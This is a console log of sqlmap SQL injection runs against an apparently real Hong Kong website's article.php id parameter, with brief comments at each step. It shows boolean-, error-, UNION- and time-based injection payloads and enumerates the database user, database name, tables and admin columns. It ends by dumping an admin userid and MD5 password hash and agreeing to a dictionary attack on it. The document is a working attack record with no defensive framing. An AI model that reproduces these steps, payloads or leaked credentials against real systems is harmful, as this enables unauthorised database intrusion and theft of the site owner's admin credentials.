D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>